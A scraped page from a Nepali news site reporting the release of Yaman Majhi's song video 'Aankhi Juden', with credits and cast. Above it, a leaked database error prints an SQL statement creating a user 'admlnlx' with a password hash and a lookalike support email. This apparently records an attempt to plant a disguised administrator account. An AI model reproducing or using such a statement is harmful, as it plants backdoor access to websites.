WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBdKSYUZSjTSQ2hS4bVfR6xMJfRg2M.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:14:36', '', 'admlnlx', 'admlnlx')

यमन माझीको ‘आँखी जुदेन’ सार्वजनिक – Gaule Khabar

यमन माझीको ‘आँखी जुदेन’ सार्वजनिक

यमन माझीको ‘आँखी जुदेन’ सार्वजनिक

काठमाडौं । माझी किङको रुपमा परिचित गायक एंव संगीतकार यमन माझी र सरिता माझीको आवाजमा ‘आँखी जुदेन’ आजको डिजिटल बजारमा सार्वजनिक भएको छ ।
शुक्रबार यमन माझीको अफिसियल युटुब च्यानलमार्फत गीतको म्युजिक भिडियो सार्वजनिक गरिएको हो ।

गीतमा यमन माझीको शब्द, संगीत र लक्षु प्रकाश मल्लले संगीत संयोजन रहेको छ भने मनोज ढंगोलले मिक्सिङ गरेका हुन् ।

म्युजिक भिडियोमा शशीकला माझी र सन्तोष माझी, विक्रम माझी, असुन माझी, अनुप माझी, इश्वर श्रेष्ठ, कविता माझी, सर्मिला माझी, देवेन्द्र माझी, राज माझी, रञ्जना माझी, अस्मिता माझी, सुस्मिता माझी, राजकुमार माझी, सपना माझी, निशा माझीलगायतको अभिनय रहेको छ ।

भिडियोलाई अर्जुन खड्काले सम्पादन गरेका हुन् भने दीपक अधिकारीले कोरियोग्राफी उनै माझी किङको रुपमा परिचित गायक एंव संगीतकार यमन माझीले निर्देशन गरेका हुन ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका